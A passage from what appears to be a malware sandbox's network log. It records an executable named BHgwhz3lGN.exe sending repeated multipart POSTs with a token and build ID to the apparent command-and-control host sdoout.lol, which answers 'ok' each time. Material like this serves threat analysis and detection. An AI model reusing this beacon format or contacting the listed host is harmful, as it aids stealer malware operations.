                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:51 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          44192.168.2.953968116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:51 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----5xtr9hdbsjmyuaa1d2dt
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1837
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:51 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 35 78 74 72 39 68 64 62 73 6a 6d 79 75 61 61 31 64 32 64 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 35 78 74 72 39 68 64 62 73 6a 6d 79 75 61 61 31 64 32 64 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 35 78 74 72 39 68 64 62 73 6a 6d 79 75 61 61 31 64 32 64 74 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------5xtr9hdbsjmyuaa1d2dtContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------5xtr9hdbsjmyuaa1d2dtContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------5xtr9hdbsjmyuaa1d2dtCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:52 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          45192.168.2.953970116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:52 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----gdba168gln7qieuaaiwb
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:52 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 67 64 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 67 64 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 67 64 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------gdba168gln7qieuaaiwbContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------gdba168gln7qieuaaiwbContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------gdba168gln7qieuaaiwbCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:53 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:53 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          46192.168.2.953972116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:53 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----5pp8q9zua1nymy5fctr1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:53 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 35 70 70 38 71 39 7a 75 61 31 6e 79 6d 79 35 66 63 74 72 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 35 70 70 38 71 39 7a 75 61 31 6e 79 6d 79 35 66 63 74 72 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 35 70 70 38 71 39 7a 75 61 31 6e 79 6d 79 35 66 63 74 72 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------5pp8q9zua1nymy5fctr1Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------5pp8q9zua1nymy5fctr1Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------5pp8q9zua1nymy5fctr1Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:54 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          47192.168.2.953974116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:54 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----djwl6pzua1nyuas2v3o8
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1837
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:54 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 64 6a 77 6c 36 70 7a 75 61 31 6e 79 75 61 73 32 76 33 6f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 64 6a 77 6c 36 70 7a 75 61 31 6e 79 75 61 73 32 76 33 6f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 64 6a 77 6c 36 70 7a 75 61 31 6e 79 75 61 73 32 76 33 6f 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------djwl6pzua1nyuas2v3o8Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------djwl6pzua1nyuas2v3o8Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------djwl6pzua1nyuas2v3o8Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:55 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          48192.168.2.953975116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:55 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----glfuas2v3w47yukxbasj
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:55 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 67 6c 66 75 61 73 32 76 33 77 34 37 79 75 6b 78 62 61 73 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 67 6c 66 75 61 73 32 76 33 77 34 37 79 75 6b 78 62 61 73 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 67 6c 66 75 61 73 32 76 33 77 34 37 79 75 6b 78 62 61 73 6a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------glfuas2v3w47yukxbasjContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------glfuas2v3w47yukxbasjContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------glfuas2v3w47yukxbasjCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:56 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          49192.168.2.953976116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:56 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----l68gdjmo89rim7glnoz5
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1837
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:56 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 6c 36 38 67 64 6a 6d 6f 38 39 72 69 6d 37 67 6c 6e 6f 7a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6c 36 38 67 64 6a 6d 6f 38 39 72 69 6d 37 67 6c 6e 6f 7a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6c 36 38 67 64 6a 6d 6f 38 39 72 69 6d 37 67 6c 6e 6f 7a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------l68gdjmo89rim7glnoz5Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------l68gdjmo89rim7glnoz5Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------l68gdjmo89rim7glnoz5Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:57 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:57 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          50192.168.2.953977116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:57 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----l68gdjmo89rim7glnoz5
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:57 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 6c 36 38 67 64 6a 6d 6f 38 39 72 69 6d 37 67 6c 6e 6f 7a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6c 36 38 67 64 6a 6d 6f 38 39 72 69 6d 37 67 6c 6e 6f 7a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6c 36 38 67 64 6a 6d 6f 38 39 72 69 6d 37 67 6c 6e 6f 7a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------l68gdjmo89rim7glnoz5Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------l68gdjmo89rim7glnoz5Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------l68gdjmo89rim7glnoz5Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:58 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:58 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          51192.168.2.953978116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:58 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----l68gdjmo89rim7glnoz5
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:58 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 6c 36 38 67 64 6a 6d 6f 38 39 72 69 6d 37 67 6c 6e 6f 7a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6c 36 38 67 64 6a 6d 6f 38 39 72 69 6d 37 67 6c 6e 6f 7a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6c 36 38 67 64 6a 6d 6f 38 39 72 69 6d 37 67 6c 6e 6f 7a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------l68gdjmo89rim7glnoz5Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------l68gdjmo89rim7glnoz5Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------l68gdjmo89rim7glnoz5Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:59 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:59 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:59 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          52192.168.2.953979116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:59 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----k6xt0zusr1n7yu3wt26p
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:59 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 6b 36 78 74 30 7a 75 73 72 31 6e 37 79 75 33 77 74 32 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6b 36 78 74 30 7a 75 73 72 31 6e 37 79 75 33 77 74 32 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6b 36 78 74 30 7a 75 73 72 31 6e 37 79 75 33 77 74 32 36 70 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------k6xt0zusr1n7yu3wt26pContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------k6xt0zusr1n7yu3wt26pContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------k6xt0zusr1n7yu3wt26pCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:00 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          53192.168.2.953980116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:00 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----wlfctjwtjw4eu37qie37
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
